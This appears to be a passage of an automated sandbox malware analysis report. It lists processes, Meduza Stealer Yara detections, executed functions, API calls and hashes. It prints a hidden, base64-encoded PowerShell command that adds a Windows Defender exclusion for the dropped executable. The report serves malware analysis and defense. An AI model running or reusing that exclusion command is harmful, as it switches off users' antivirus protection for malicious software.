Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:36:00
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA
Imagebase:	0xf60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:36:00
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:36:01
Start date:	15/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:36:24
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe"
Imagebase:	0x7ff6a7040000
File size:	2'632'704 bytes
MD5 hash:	183E24B654414D7BE786CCD8E6A108A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	188
Total number of Limit Nodes:	14

Executed Functions

Function 075705E8 Relevance: 1.9, Strings: 1, Instructions: 654
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{", xrefs: 07570C80, 07570C85

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID:
String ID: {"
API String ID: 0-4254758213
Opcode ID: 7c9c7cbf0d65e72c1bfbd7a52778b30e4c0b5d90c58f4635e4b707d88f1368e2
Instruction ID: bf159c3c636063064ceea5f48fb3d37221d55fd7175f5796a450d8a8189d3951
Opcode Fuzzy Hash: 7c9c7cbf0d65e72c1bfbd7a52778b30e4c0b5d90c58f4635e4b707d88f1368e2
Instruction Fuzzy Hash: C4629F74A00229CFDB64DF68C884BD9B7B1FF8A300F5095A9D449AB361DB30AE85CF51

Function 075754A0 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ebc841a8b30bb64229cf4420067993de8265e6b1ee2c5a3a1eecb73ce4382ef
Instruction ID: 6a96d8bb1d7f6f7c727efacca2ae8b61f06eeb8007457560f5089a0c7c6aa0cd
Opcode Fuzzy Hash: 7ebc841a8b30bb64229cf4420067993de8265e6b1ee2c5a3a1eecb73ce4382ef
Instruction Fuzzy Hash: 52D1AAB17007028FEB29DB79D454BAE77FABFC9600F24846AD146DB290EB34D902CB51

Function 07572768 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955d005f06d0d38eaf56270032dd728c8909ce7343b7918242f474d7fa9ab3df
Instruction ID: f58fa1c03e08a0b417990abd85c1742b5b1ace0d6ffb9ba09de5ff7016330208
Opcode Fuzzy Hash: 955d005f06d0d38eaf56270032dd728c8909ce7343b7918242f474d7fa9ab3df
Instruction Fuzzy Hash: 0AC1B374A0121ACFCB14DFA8D984ADDB7B2FF49310F2095A9D409AB365DB74AD82CF50

Function 0550D3E9 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0550D476
GetCurrentThread.KERNEL32 ref: 0550D4B3
GetCurrentProcess.KERNEL32 ref: 0550D4F0
GetCurrentThreadId.KERNEL32 ref: 0550D549

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 44c77e50880322cd980907071e058818167f195d6041b2bdb32768ef9cc5f0f5
Instruction ID: 8df170355e8f390099b43c77bc2eab02a862525da752cef24fa6b29e21440345
Opcode Fuzzy Hash: 44c77e50880322cd980907071e058818167f195d6041b2bdb32768ef9cc5f0f5
Instruction Fuzzy Hash: A85136B09003498FEB54CFA9D548BAEBBF1BF88304F208459E419A72A0DB799944CB65

Function 0550D3F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0550D476
GetCurrentThread.KERNEL32 ref: 0550D4B3
GetCurrentProcess.KERNEL32 ref: 0550D4F0
GetCurrentThreadId.KERNEL32 ref: 0550D549

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ba4a1cf6421ad386bf11a8663c2ad3a7cbe21114767aee7548b7319635f216b5
Instruction ID: 001f395e718839dfaa55d14080ca9b059d3a741d8b730b426291f593b4f0d27d
Opcode Fuzzy Hash: ba4a1cf6421ad386bf11a8663c2ad3a7cbe21114767aee7548b7319635f216b5
Instruction Fuzzy Hash: 5F5126B09003498FEB54CFA9D548BDEBBF1FF88314F208459E419A73A0DB79A944CB65

Function 07573DD0 Relevance: 3.2, APIs: 2, Instructions: 189
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 07573E41
GetFocus.USER32 ref: 07573EA7

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: ActiveFocusWindow
String ID:
API String ID: 2022189218-0
Opcode ID: dbbd21dd177917cebe614bf71ceca34c0392f7d268139231098971f9d0aaa01d
Instruction ID: ac72fe8c93b6e8b6d20efb35f3d1fb1b847778285bf4ff7fc529eba7023d1cd1
Opcode Fuzzy Hash: dbbd21dd177917cebe614bf71ceca34c0392f7d268139231098971f9d0aaa01d
Instruction Fuzzy Hash: CA711AB4A0025A8FDB14DF69D988AAEBBF5FF48210F158459E804EB351C738ED45CBA1

Function 07572C68 Relevance: 1.8, APIs: 1, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 07572DF5

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: ActiveWindow
String ID:
API String ID: 2558294473-0
Opcode ID: 06d07baaa22a6b393f9ab5dff3598f88ea420c2b20989f5e5bca1135f4914ec8
Instruction ID: 324474e6d21e10cf784b5df8f32ffba1ba6f9dfb225d259767d7da8b6a83dabd
Opcode Fuzzy Hash: 06d07baaa22a6b393f9ab5dff3598f88ea420c2b20989f5e5bca1135f4914ec8
Instruction Fuzzy Hash: 00B1AF71B002068BDB18AFB9D4557AE7BB6BFC8300F148529E906EB380DF349C46DB65

Function 0550AD68 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0550AFBE

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5999d870aedb5018d0e4589120148934d088107d91c1a0e21878d7727cbdea79
Instruction ID: ee961924e8aabd6bdb62e11d8ccb0ba7bd6550548817beaac61053dbfef96b62
Opcode Fuzzy Hash: 5999d870aedb5018d0e4589120148934d088107d91c1a0e21878d7727cbdea79
Instruction Fuzzy Hash: 6C711570A00B058FE724DF2AD45579ABBF2FF88204F108A2DD58AD7B90DB75E845CB91

Function 07572C57 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b023d1f9cf2bb023cc80b290dda95bbdb8859f8a6330d23360efa9204819ec0
Instruction ID: 5d2da94289ba77b173222b43e7f9399554ddb89c2d5095a32e23c92b1c2883b1
Opcode Fuzzy Hash: 3b023d1f9cf2bb023cc80b290dda95bbdb8859f8a6330d23360efa9204819ec0
Instruction Fuzzy Hash: E5615EB0E1035A9FDB14DFA5D4557EDBBB6FF84300F14842AE805AB394EB349845CB51

Function 07574F90 Relevance: 1.7, APIs: 1, Instructions: 157
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 07575050

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e468ed607b08b46f030c5f8c27dc2adf991c874c181cc29611c5e7adedb5ad10
Instruction ID: 8d9f0555c77a42ee6ca14d23d5db563bb2a009986bfc8a39eb7f76167e5a55ce
Opcode Fuzzy Hash: e468ed607b08b46f030c5f8c27dc2adf991c874c181cc29611c5e7adedb5ad10
Instruction Fuzzy Hash: E9614AB4A10219DFDB14DFA9E884BEDBBB1FF44311F10815AE401AB390EB399885CF90

Function 055044B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 055059C9

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: aa9dd0370a35968bc50a50718e59498e107545ab62cdb66390164ca31ac422a5
Instruction ID: e0bf078620b8ecc4d1adaaead4a4802f64ec489bece5c29d410fe2eb03c8d6d7
Opcode Fuzzy Hash: aa9dd0370a35968bc50a50718e59498e107545ab62cdb66390164ca31ac422a5
Instruction Fuzzy Hash: 4041AF70C00729CBDB24CFAAC884BDDBBF5BF88704F20856AD409AB255EB755945CF90

Function 0550590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 055059C9

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b315f01840d4138f03e8536adb29789d89dc99db260088f184f7e92d818a3039
Instruction ID: 7b4566a3baa88cb4b306f7cbc3496049d7cc880bb47eaa2ee2491d5c0cddee84
Opcode Fuzzy Hash: b315f01840d4138f03e8536adb29789d89dc99db260088f184f7e92d818a3039
Instruction Fuzzy Hash: DA41CF70C00729CEDB24CFAAC884BDEBBF5BF88704F20816AD409AB255EB755945CF50

Function 0550D701 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0550D6C7

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e7401f0b44ca017bd0fb7f4466b2898bc21569cfc9ab931f4e29734b214be898
Instruction ID: 143dd8a65acdfbfa489730f8b1e2b72fefceaf8023fc301a673f8f7f634a813d
Opcode Fuzzy Hash: e7401f0b44ca017bd0fb7f4466b2898bc21569cfc9ab931f4e29734b214be898
Instruction Fuzzy Hash: A6316A346503C0CFEB108FA4E8AA7297FA6F784311F10802EF9529B3D1CEB84849EB11

Function 07573AB8 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 07573B4A

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b420d862c2a6c8cf2139fbc3e42d9851cc02a241f718061c998800af9a945e78
Instruction ID: 1210dcb08a18ced88b3fe97e2ecf02e2aadda26dc5caa0ba8ba9f88e9add8b43
Opcode Fuzzy Hash: b420d862c2a6c8cf2139fbc3e42d9851cc02a241f718061c998800af9a945e78
Instruction Fuzzy Hash: B23120B090024A8FCB00DFA9D881BDEFBF0FB48314F108969D419AB311D738A845CBA5

Function 07573345 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,05EBD49E,?,?,?,00000E20,?,?,07573B98,0408410C,030CC248), ref: 07573C29

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: d46719c7a62a4020f1d2b8d1e7dd3a1485709d14ec14f8e643ae9286e718bc59
Instruction ID: 44459af738c9b3bbd4d33440a96bf5b7318d3a4f28dea1a4a7d5d73665888cf7
Opcode Fuzzy Hash: d46719c7a62a4020f1d2b8d1e7dd3a1485709d14ec14f8e643ae9286e718bc59
Instruction Fuzzy Hash: 4E216AB190428A8FDB10CF9AC844BEEFBF8FF88320F14846AD454A7251D778A945CF65

Function 07573AC8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 07573B4A

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 0dd9063c4e0f6498f18b0de7a2ace18f73c9e426472e5982e104f8add02eab16
Instruction ID: 9d26216f5de3d81638333c0935f9233e330631c1256c77d8e236aed7602a61d7
Opcode Fuzzy Hash: 0dd9063c4e0f6498f18b0de7a2ace18f73c9e426472e5982e104f8add02eab16
Instruction Fuzzy Hash: 892122B490024ACFDB10DF99D884ADEFBF1FB48324F108969D419AB311D738A945CFA5

Function 0757334C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,05EBD49E,?,?,?,00000E20,?,?,07573B98,0408410C,030CC248), ref: 07573C29

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 0607fbfa10d544aadae3994c29b96ac027dd13c4d2d8f6ae195020da69384067
Instruction ID: e1b90ee93f124ab405fd5932d50c63aedf3299b306a10375ce5b9090895cb410
Opcode Fuzzy Hash: 0607fbfa10d544aadae3994c29b96ac027dd13c4d2d8f6ae195020da69384067
Instruction Fuzzy Hash: F52138B190024A9FDB10CF9AC844BEEFBF8FB88320F14842AD414A7250D778A944CF65

Function 07573BB1 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,05EBD49E,?,?,?,00000E20,?,?,07573B98,0408410C,030CC248), ref: 07573C29

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 636a3673735684de75812c3850b6b14606167fdfbe9c9fe8e4ce5dc6fbe2c467
Instruction ID: a556c065c4a07e9b097bdfc3d694f29c260b7cbf46b31b0c0e5311ede260dac9
Opcode Fuzzy Hash: 636a3673735684de75812c3850b6b14606167fdfbe9c9fe8e4ce5dc6fbe2c467
Instruction Fuzzy Hash: 3C2115B190025A8FDB10DFAAC845BEEFBF8FB88320F14842AD415A7250D778A945CF65

Function 0550D640 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0550D6C7

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0a573b83a9b86877e157514820d97e624da18646524f18e6c253ccd990ae9fdf
Instruction ID: 14a3b3e64190dae0938caf23d34f9305866de0afc5a5beb0996ef6b43afb7367
Opcode Fuzzy Hash: 0a573b83a9b86877e157514820d97e624da18646524f18e6c253ccd990ae9fdf
Instruction Fuzzy Hash: B621C4B5900259DFDB10CF9AD984ADEFBF4FB48310F14841AE918A7350D374A954CFA5

Function 0550D638 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0550D6C7

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c1262a65c2b936ef24823e4971ee70e4ba876966d403423b485e2eb73e5d371b
Instruction ID: b47c0b953a2996b951a8df99fd674594055db9690716147ce006f9a1082781ae
Opcode Fuzzy Hash: c1262a65c2b936ef24823e4971ee70e4ba876966d403423b485e2eb73e5d371b
Instruction Fuzzy Hash: E921E0B5D00219DFDB10CFAAD985AEEBBF4FB48320F14841AE918B7250C378A954CF64

Function 075740B0 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,07572EA9,?,?,?), ref: 07574135

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 859580847c55b7c5271c7037204ec8ae2012a711650ab425c70beac95ec3f617
Instruction ID: 4f1c424d17506618849f5b74e034eada47b4616163c2ee9394ed3c2afd976a2e
Opcode Fuzzy Hash: 859580847c55b7c5271c7037204ec8ae2012a711650ab425c70beac95ec3f617
Instruction Fuzzy Hash: B22102B680035ADFCB10CF9AD884ADEFBF4FB48310F20842AE818A7210C375A544CBA4

Function 075720A8 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,07572EA9,?,?,?), ref: 07574135

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 34425eb54f461f90010ca6f56f99e25b8477e3c0c4ac1c14b531eac7b2f27520
Instruction ID: 267262c9797a97bc8e39f7dddb03f2d94e25023db9b5cb309066db61461ae99b
Opcode Fuzzy Hash: 34425eb54f461f90010ca6f56f99e25b8477e3c0c4ac1c14b531eac7b2f27520
Instruction Fuzzy Hash: 4B2104B59003499FCB10DF9AD884ADEFBF4FB48310F10842EE818A7200C375A544CBA4

Function 07573FF9 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 07574067

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0821b985c8e5bb5407910541215f0d081a9d65b486480a7cb7bb55c349c87a6e
Instruction ID: c3e1e1e0c00a5adde94f0a09fd1684effaa95bf34a471addc21a396202e5e2a0
Opcode Fuzzy Hash: 0821b985c8e5bb5407910541215f0d081a9d65b486480a7cb7bb55c349c87a6e
Instruction Fuzzy Hash: 96112BB580075ACFDB10CF9AD445BEEBBF4EB48320F14846AD558A7641D338A544CFA5

Function 07574000 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 07574067

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4eb86d92f699260c956b54f1b4c65f08ffd88c5e60beb50972321f0ae628aa53
Instruction ID: d1a042bc2a08023bc5d15dc70f04673a20f6249f2c0d63db3d2d532bc493aaa0
Opcode Fuzzy Hash: 4eb86d92f699260c956b54f1b4c65f08ffd88c5e60beb50972321f0ae628aa53
Instruction Fuzzy Hash: 851136B580064ACFDB20CF9AD445BEEFBF4FB48320F14846AD558A7240D338A684CFA5

Function 07575281 Relevance: 1.5, APIs: 1, Instructions: 48threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 075752E8

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3dd1c605508afa28f59256158b3f4fcafae7d7e59cdf28e8f685a64b19c35ac4
Instruction ID: 94dbd909adb368d03ac46c34bf89f75094f6b36f2bfd0b83f28b6a73c7933c6d
Opcode Fuzzy Hash: 3dd1c605508afa28f59256158b3f4fcafae7d7e59cdf28e8f685a64b19c35ac4
Instruction Fuzzy Hash: 9011EFB1800749AFDB10CF99D84ABDEBFF4FB08324F10884AE558A7251C379A954CBA4

Function 075734A8 Relevance: 1.5, APIs: 1, Instructions: 47threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 075752E8

Memory Dump Source

Source File: 00000000.00000002.3257543309.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_9RM52QaURq.jbxd

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b386e6a8d03f839fccccd15d97651b8b09830da23837030571b0c99c9869c7fd
Instruction ID: 1eeb7cd6d92f35a67434e9e5946e9069b151d7a5f282f5001dd368091b80abe3
Opcode Fuzzy Hash: b386e6a8d03f839fccccd15d97651b8b09830da23837030571b0c99c9869c7fd
Instruction Fuzzy Hash: 451102B0800309EEDB10CF89D84ABDEBFF4FB08320F10884AE559B7240C375A954CBA4

Function 0550AF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0550AFBE

Memory Dump Source

Source File: 00000000.00000002.3247576163.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5500000_9RM52QaURq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7af95cecc23577d8c071aa08744a9b4c8797ae1c1fcd02600f5dfc27a70de0dc
Instruction ID: 0a385ac65ab44da0986a06de0ae421293336be9c7bb5ba6b16006ce655844dac
Opcode Fuzzy Hash: 7af95cecc23577d8c071aa08744a9b4c8797ae1c1fcd02600f5dfc27a70de0dc
Instruction Fuzzy Hash: 2511DCB6C047498FDB10CF9AD844BDEFBF4BB88224F10842AD829A7650C779A545CFA5

Function 0167D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3244043663.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_9RM52QaURq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ff34f741c6324002a3dd0088b05b27a1ddfa9ca76e753ee1cd0ad9a060bb3cb
Instruction ID: 785f6f7690b56bef8c8e336ed7eef6f09e8dc4e0bd8697e19454ce7824b4c613
Opcode Fuzzy Hash: 3ff34f741c6324002a3dd0088b05b27a1ddfa9ca76e753ee1cd0ad9a060bb3cb
Instruction Fuzzy Hash: 2E210372500204EFDB05DF54D9C0B5ABF65FF88324F20C96DE90A4B25AC336E456CAA1

Function 0168D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

